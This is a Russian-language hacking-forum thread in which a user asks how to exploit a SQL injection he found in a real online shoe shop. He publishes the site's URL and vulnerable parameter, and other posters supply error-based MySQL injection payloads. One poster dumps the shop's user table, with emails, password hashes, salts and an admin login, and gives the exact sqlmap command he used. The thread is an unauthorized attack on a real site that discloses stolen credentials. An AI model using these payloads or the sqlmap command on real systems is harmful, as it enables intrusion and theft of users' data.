ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)
-   -   Нашел инъекцию, а дальше??? (https://forum.antichat.xyz/showthread.php?t=429483)

joomla 26.08.2015 05:07
Здравствуйте, коллеги Вообщем недавно решил помимо разработки сайтов научиться взламывать сайты. Нарыл один интересный интернет-магазин, и сразу же нашел SQL инъекцию.

http://storage3.static.itmages.ru/i/...cd034d40ce.png

Вообщем что только не придумывал, и union прописывал и т.д.

Вылетает одна и та же хрень, ошибка синтаксиса. Инъекция работает если ставить " кавычку.

http://storage2.static.itmages.ru/i/...79a5a0d2df.jpg

Какие еще могут быть варианты для взлома?

Br@!ns 26.08.2015 06:37
Пробуйте error based вектор. например:

'or(ExtractValue(1,concat(0x3a,(select(version())) )))='1

или

'-updatexml(0,repeat(version(),2),2)#

sander 26.08.2015 11:13
Чувак я советую полностью тебе ссылку закрывать,я её через inurl нашёл .

joomla 27.08.2015 02:17
Цитата:
Сообщение от SaNDER

Чувак я советую полностью тебе ссылку закрывать,я её через inurl нашёл .
да все равно, кто нашел, тот молодец. Сайт я взломать пытаюсь не для корыстной цели, а для практики.

----------------------------------

joomla 27.08.2015 02:18
Цитата:
Сообщение от Br@!ns

Пробуйте error based вектор. например:
'or(ExtractValue(1,concat(0x3a,(select(version())) )))='1
или
'-updatexml(0,repeat(version(),2),2)#
Не помогло....

faza02 27.08.2015 16:37
"))))||1+group+by+concat(version(),floor(rand(0)*2 ))having+min(0)%23

в ошибке увидите версию

sander 27.08.2015 17:43
Цитата:
Сообщение от yarbabin

"))))||1+group+by+concat(version(),floor(rand(0)*2 ))having+min(0)%23
в ошибке увидите версию
Тоже не пашет .

BabaDook 27.08.2015 17:45
Цитата:
Сообщение от yarbabin

"))))||1+group+by+concat(version(),floor(rand(0)*2 ))having+min(0)%23
в ошибке увидите версию
а какого типа эта инъекция, если можно манукльчик ))

OxoTnik 27.08.2015 17:45
Цитата:
Сообщение от BabaDook

а какого типа эта инъекция, если можно манукльчик ))
error based

joomla 28.08.2015 02:22
Вообщем кому интересно ломануть сайтик, а потом рассказать (поделиться опытом), как это сделал, вот ссыль - http://xn--80abd6ar5a2c.xn--p1ai/

Инъекция - http://xn--80abd6ar5a2c.xn--p1ai/shop/product/filter?productFilter[_ef][gender][]=Мужская"

hicel 28.08.2015 14:59
Цитата:
Сообщение от SaNDER

Тоже не пашет .
Пашет всё=)

joomla 28.08.2015 17:58
Цитата:
Сообщение от hicel

Пашет всё=)
что-то не получается

kingbeef 28.08.2015 18:02
Цитата:
Сообщение от joomla

что-то не получается
Убери одну скобку в запросе.

")))||1+group+by+concat(version(),floor(rand(0)*2) )having+min(0)%23

Надо ошибки тоже читать.

joomla 28.08.2015 23:02
Цитата:
Сообщение от kingbeef

Убери одну скобку в запросе.
")))||1+group+by+concat(version(),floor(rand(0)*2) )having+min(0)%23
Надо ошибки тоже читать.
красавчик ))

strelok20094 29.08.2015 02:31
base: w106051

Table: user

[5 entries]

+----------------------+---------------+-------------------------------+-------------+

| email | password | salt | login |

+----------------------+---------------+-------------------------------+-------------+

| @ya.ru | $2nWSDmGDU.V6 | $2a$14$2JzmyFg/HuG55/xYBrIXMA | delvin |

| @altlogic.ru | $22dAubujSFfU | $2a$14$EnpIvtkw.xRbLRzjwbquxg | admin |

| @mail.ru | $2JpCew0SKvc. | $2a$14$ltDzAFvK5i0qU33i2nvaPg | durova_vita |

| @tagan.ru | $24LkUVLWIjU2 | $2a$14$tk2uQd0jCUpmApJ6kmSB/g | dmi |

| @gmail.com | $2KvStv//sqiM | $2a$14$VNPbpZZMDzNBW8Lt9JD6dw | obuvka |

+----------------------+---------------+-------------------------------+-------------+

sqlmap -u "http://обувъка.рф/shop/product/filter?productFilter[_ef][gender][]="*" --dbms Mysql --time-sec 10 --threads 10 --level 3 --risk 3 --technique E -D w106051 -T user -C email,password,salt,login --dump

joomla 29.08.2015 04:24
Цитата:
Сообщение от strelok20094

base: w106051
Table: user
[5 entries]
+----------------------+---------------+-------------------------------+-------------+
| email | password | salt | login |
+----------------------+---------------+-------------------------------+-------------+
| @ya.ru | $2nWSDmGDU.V6 | $2a$14$2JzmyFg/HuG55/xYBrIXMA | delvin |
| @altlogic.ru | $22dAubujSFfU | $2a$14$EnpIvtkw.xRbLRzjwbquxg | admin |
| @mail.ru | $2JpCew0SKvc. | $2a$14$ltDzAFvK5i0qU33i2nvaPg | durova_vita |
| @tagan.ru | $24LkUVLWIjU2 | $2a$14$tk2uQd0jCUpmApJ6kmSB/g | dmi |
| @gmail.com | $2KvStv//sqiM | $2a$14$VNPbpZZMDzNBW8Lt9JD6dw | obuvka |
+----------------------+---------------+-------------------------------+-------------+
sqlmap -u "http://обувъка.рф/shop/product/filter?productFilter[_ef][gender][]="*" --dbms Mysql --time-sec 10 --threads 10 --level 3 --risk 3 --technique E -D w106051 -T user -C email,password,salt,login --dump
Можете рассказать как сделали?

hicel 29.08.2015 11:49
Цитата:
Сообщение от joomla

Можете рассказать как сделали?
sqlmap гугли...

joomla 29.08.2015 17:48
Цитата:
Сообщение от hicel

sqlmap гугли...
От души

hicel 30.08.2015 00:08
Цитата:
Сообщение от joomla

От души
Так то думать надо .... читать ...

(sqlmap - хороший софт, но лучше учись сам раскручивать ИМХО.)

darkart 29.10.2015 08:04
Цитата:
Сообщение от hicel

Так то думать надо .... читать ...
(sqlmap - хороший софт, но лучше учись сам раскручивать ИМХО.)
зачем изобретать велосипед? есть софт он работает

по логу можно понять что происходит

а вот если автоматизация не прокатила то да имеет смысл копать руками!

п.с. имхо


Время: 04:55